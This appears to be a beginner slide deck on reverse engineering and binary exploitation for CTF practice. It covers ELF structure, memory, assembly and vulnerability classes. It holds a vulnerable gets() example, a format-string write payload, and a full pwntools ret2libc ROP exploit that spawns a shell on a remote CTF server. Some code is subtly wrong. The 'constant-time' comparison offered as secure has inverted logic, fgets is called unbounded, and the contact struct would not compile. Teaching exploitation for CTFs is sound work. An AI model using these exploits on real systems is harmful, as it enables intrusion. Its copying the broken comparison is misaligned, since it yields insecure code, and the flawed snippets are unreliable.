Reverse Engineering & Exploitation (pwn) - 101

Who Am I?

Graduated from UMD in '19 with a BS in CS. Involved in CSEC and helped create challenges for UMDCTF-2018/19.

 

Now I have to be an adult and work our lives away, but still love CTFs and connecting with the community! (And we love our jobs! #cyberroolz)

Mike - WittsEnd2

Software Engineer - C, Python, & Web

Reverse Engineer

Graduate Student - M. Eng. Cyber Sec.

Hobbies: CTFs/Dev Projects, Entrepreneurship, Baseball, Music, Stocks

 

How to Reach Me

#include <stdlib.h>
typedef struct Contact {
    char discord[32]; // <- best way to contact me
    char twitter[32];
    char github[32];
} Contact;

struct Contact *shareContact() {
    Contact *contactInfo = malloc(sizeof(struct Contact));
    contactInfo->discord = "WittsEnd2#9274";
    contactInfo->twitter = "@RagnarSecurity";
    contactInfo->github = "WittsEnd2";
    return contactInfo;
} 

Agenda

- Define Reverse Engineering and Exploitation (pwn) 

- Understanding How Files Are Compiled

- Memory

- Analysis and Assembly

- Vulnerabilities 

- Additional Tools

What the F*** is pwn and Reverse Engineering? 

Definition 1: It's Magic

Reverse Engineering

A process of extracting knowledge from engineered artifacts.

Binary Exploitation

Binary exploitation is the process of subverting a compiled application such that it violates some trust boundary in a way that is advantageous to the attacker.

The Header

The header contains the blueprint to the program you are analyzing!

Layout of a Compiled ELF File

Contains data about linking and execution

An array of entries where each entry describes a segment or other info in regarding the file

Segments contain either code or data, related to the program's execution.

The section header table has all of the information necessary to locate and isolate each of the file's sections.

ELF Header

#define EI_NIDENT 16

typedef struct {
        unsigned char e_ident[EI_NIDENT];
        Elf32_Half    e_type;
        Elf32_Half    e_machine;
        Elf32_Word    e_version;
        Elf32_Addr    e_entry;
        Elf32_Off     e_phoff;
        Elf32_Off     e_shoff;
        Elf32_Word    e_flags;
        Elf32_Half    e_ehsize;
        Elf32_Half    e_phentsize;
        Elf32_Half    e_phnum;
        Elf32_Half    e_shentsize;
        Elf32_Half    e_shnum;
        Elf32_Half    e_shtrndx;
} Elf32_Ehdr;
$ readelf -h a.out       ###Output modified slightly  
  Magic:   7f 45 4c 46               \x7fELF
  Class:                             ELF32
  Data:                              little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x8048430
  Start of program headers:          52 
  Start of section headers:          8588 
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         9
  Size of section headers:           40 (bytes)
  Number of section headers:         35
  Section header string table index: 34

e_ -- elf

ph -- program header

sh -- section header

off -- offset

ent -- entry

Section Header

TRY: 

$ readelf -S /bin/bash

### modified output 
  [Nr] Name              Type      
  [ 0]                   NULL      
  [ 1] .interp           PROGBITS  
  [ 2] .note.ABI-tag     NOTE      
  [ 3] .note.gnu.build-i NOTE      
  [ 4] .gnu.hash         GNU_HASH  
  [ 5] .dynsym           DYNSYM    
  [ 6] .dynstr           STRTAB    
  [ 7] .gnu.version      VERSYM    
  [ 8] .gnu.version_r    VERNEED   
  [ 9] .rela.dyn         RELA      
  [10] .rela.plt         RELA      
  [11] .init             PROGBITS  
  [12] .plt              PROGBITS  
  [13] .plt.got          PROGBITS  
  [14] .text             PROGBITS  
  [15] .fini             PROGBITS  
  [16] .rodata           PROGBITS  
  [17] .eh_frame_hdr     PROGBITS  
  [18] .eh_frame         PROGBITS  
  [19] .init_array       INIT_ARRAY
  [20] .fini_array       FINI_ARRAY
  [21] .data.rel.ro      PROGBITS  
  [22] .dynamic          DYNAMIC   
  [23] .got              PROGBITS  
  [24] .data             PROGBITS  
  [25] .bss              NOBITS    
  [26] .gnu_debuglink    PROGBITS  
  [27] .shstrtab         STRTAB 

What is a section header?

 

 

 

 

What are some sections that are useful to us?

 

    .text

    .got

    .data

   A well defined header that gives information on a section of the binary which is unstructured.

Program Header

Program headers indicates how segments required for execution are to be loaded into virtual memory.

 

There exists a Sections to Segment mapping that specifies which sections are part of which segments. 

 

Most disassemblers recreated the  does all analysis based on virtual addressing

More ELF File Info:

https://slides.com/drakemp/hacs408e-elf

More PE File Info:

https://slides.com/drakemp/hacs408e-pe

Memory

Paging

Organizes memory  (or disk) into chunks

Typically between 512 bytes and 8192 bytes

Page Table

Groups Tables Together 

A page that contains pointers to Pages

 

How Addresses Are Built

[Page Pointer][Intermediate][Offset]

 

Paging Algorithms

  •  First-in First-out (FIFO)
    •  Performs poorly in practical applications
    • Many variations, e.g. second chance
  • ​Least Recently Used (LRU)
    •  Tracks page usage over short period of time
    •  Near optimal performance… in theory
    •  Can be expensive to implement 
  •  Random
    •  Performs better than FIFO!
    •  Fallback algorithm when LRU degrades

Memory Layout - 32 Bit

Primary places we work with memory are...

  • Stack
  • Heap

BSS Section

Uninitialized Static and Global Variables

Data Section

Initialized Static and Global Variables

The Stack - 32 bit

We are assuming integers and Intel Architecture in this example

The Stack - 32 bit

Local Var 1

Local Var 3

Local Var 2

Param 3

Param 2

Param 1

We are assuming integers and Intel Architecture in this example

Data Structures

ebp

ret

param1

int var 1

int arr[2]

int arr[1]

int arr[0]

int arr[3]

Important Things To Know

  • Size of Types of Data (int, float, etc.) 
  • Pointers
  • Structs & Linked List
  • Arrays

Register

  • The processor's "memory"
  • Data that is extremely fast to access
  • Doesn't hold a lot of data
  • Can access portions of registers too

Static And Dynamic Analysis

Static

Learning how programs are behave without running the executable. 

 

  • Lots of assembly.
  • Requires disassembler.
  • The "cool" way of reversing.
  • Should be last resort (unless you have source code). 

Dynamic

Learning how programs behave by running the executable. 

  • Use of debuggers and tools like strace/ltrace.
  • Can help pinpoint errors and spots for further analysis. 
  • Helpful to have knowledge of static analysis to compliment.

Assembly

Byte Code That is Human Readable

  • Required to do RE 
  • Many architectures: (x86, ARM)
  • Two primary syntax: Intel and ATT
    • Intel: inst, dest, src1, src2, ...
    • Att: inst, src1, src2, ..., dest

Processor manuals are your friend!

PUSH       EBP
MOV        EBP,ESP
AND        ESP,0xfffffff0
SUB        ESP,0x20
CMP        dword ptr [EBP + param_1],0x2
JLE        LAB_0804852c
MOV        EAX,dword ptr [EBP + param_2]
ADD        EAX,0x4
MOV        EAX,dword ptr [EAX]
MOV        dword ptr [ESP]=>local_30,EAX
CALL       atoi                          ; int atoi(char * __nptr)
MOV        dword ptr [ESP + local_18],EAX
MOVSX      ECX,AX
MOV        EDX,dword ptr [ESP + local_18]
MOV        EAX,dword ptr [ESP + local_14]
MOV        dword ptr [ESP + local_24],ECX
MOV        dword ptr [ESP + local_28],EDX
MOV        dword ptr [ESP + local_2c],EAX
MOV        dword ptr [ESP]=>local_30,s_%d_*_%d_==_%d_0804   = "%d * %d == %d\n"
CALL       printf                                           int printf(char * __format, ...)
JMP        LAB_0804859c

                         LAB_08048590                                     
MOV        dword ptr [ESP]=>local_30,s_Something_went_hor   = "Something went horribly wrong"
CALL       puts                                             int puts(char * __s)

                         LAB_0804859c                                      
MOV        EAX,0x0

                         LAB_080485a1                                    
LEAVE
RET

Exploitation (pwn)

Buffer Overflow

  • Overwriting Memory To Get Desired Execution.
  • Caused by unbound stdin
    • gets
    • printf
    • fgets
  • Can be both stack or heap based - How are they different?

Input

int main() {
    char buff[12]; 
    gets(buff);
    return 0;
}

Buffer Overflow

  • Overwriting Memory To Get Desired Execution.
  • Caused by unbound stdin
    • gets
    • printf
    • fgets
  • Can be both stack or heap based - How are they different? 

Input

Overwrite original return address to either shellcode or another address in the program. 

Format String

  • Occurs when the submitted data of an input string is evaluated as a command by the application.
  • Evaluate the stack via common format strings (e.g. %x, %s, %p)
  • Add malicious code using %n
    • Stores the number of bytes written to the screen thus far to an int*
#include  <stdio.h> 
void main(int argc, char **argv)
{
	// This line is safe
	printf("%s\n", argv[1]);

	// This line is vulnerable
	printf(argv[1]);
}

Let's say: ABCDABCD %p.%p.%261$p.%4n is our payload. This will execute *0x44434241 = 35. 

 

Why is that?

Timing Attacks

  • Based on either delays or inconsistencies with execution time.
     
  • If we know long it takes for the thing we want to execute, we can use that to attack the software.
bool insecureStringCompare(void *a, void *b, size_t length) {
  const char *ca = a, *cb = b;
  for (size_t i = 0; i < length; i++)
    if (ca[i] != cb[i])
      return false;
  return true;
}
bool constantTimeStringCompare(void *a, void *b, size_t length) {
  const char *ca = a, *cb = b;
  bool result = true;
  for (size_t i = 0; i < length; i++)
    result &= ca[i] != cb[i];
  return result;
}

Which is vulnerable? 

Linking Attacks

What is linking?

  • Linking allows the program to execute code from the outside.
  • Reduces the size of the program, and compilation time.
  • Linux: .so
  • Windows: .dll

Common Linked Functions:

  • printf 
  • puts
  • atoi
  • etc...

Linking Attacks

We are redefining what the binary's link is referencing to so that we can trick it to execute what we want! 

 

Essentially inserting malicious code in place of where valid code should be.

Tools

Debuggers

  • Allows you to step through programs and understand how they work
  • Great for verifying if exploit works
  • Linux - Use GDB
  • Extension designed for exploitation
  • Windows - Use WinDBG

Disassemblers

  • IDA Pro
  • Ghidra
  • Binary Ninja
  • Radare2
  • Cutter

Translates machine code to assembly (or even C code). 

pwntools

  • Framework to make exploitation easier
  • Commonly used for ctf challenges
  • ROP Chain Builder (no need to look for gadgets).
  • Format String Builder


http://docs.pwntools.com/en/stable/


from pwn import *

context(os='linux', arch='amd64') 

# p = process('./return-to-what')
p = remote('chal.duc.tf', 30003)
binary = ELF('./return-to-what')
rop = ROP(binary)
libc = ELF('./libc6_2.27-3ubuntu1_amd64.so')

junk = b'A'*56

rop.puts(binary.got['puts'])
rop.call(binary.symbols['vuln'])

log.info("Stage  1 ROP chain:\n" + str(rop.dump()))

stage1 = junk + rop.chain()

p.recvuntil('Where would you like to return to?')
p.sendline(stage1)
p.recvline()

leaked_puts = p.recvline()[:8].strip().ljust(8,b'\x00')
log.success ("Leaked puts@GLIBC: " + str(leaked_puts))
leaked_puts=u64(leaked_puts)

libc.address = leaked_puts - libc.symbols['puts']


rop2 = ROP(libc)
rop2.system(next(libc.search(b'/bin/sh\x00')), 0, 0)

# rop2 = ROP(binary)
# rop2.call(libc.symbols['system'], (next(libc.search(b'/bin/sh\x00')), ))


log.info("Stage II ROP Chain: \n" + rop2.dump())
stageII = junk + rop2.chain()
p.recvuntil('Where would you like to return to?')
p.sendline(stageII)
p.recvline()
p.interactive()

The Giant List of Other Tools

  • Strace
  • Ltrace
  • Upx 
  • GEF/Peda
  • UPX
  • WinDBG
  • GDB
  • PEDA
  • GEF
  • OllyDbg
  • PEView
  • readpe
  • readelf
  • Wireshark
  • IDA
  • Binary Ninja
  • Cutter
  • Radare2
  • Ghidra
  • angr
  • capstone

Practice Problems

https://github.com/Ragnar-Security/Practice-Problems

Learn More

http://security.cs.rpi.edu/courses/binexp-spring2015/

https://sldies.com/drakemp

https://slides.com/ragnarsecurity (will post more)

 

Do some CTFS

Work Cited

https://slides.com/drakemp

Allen Hazelton - ENPM696

Dharmalingam Ganesan - ENPM691 (Linking)

How To Pwn/Rev 101

By Ragnar Security

How To Pwn/Rev 101

t

  • 493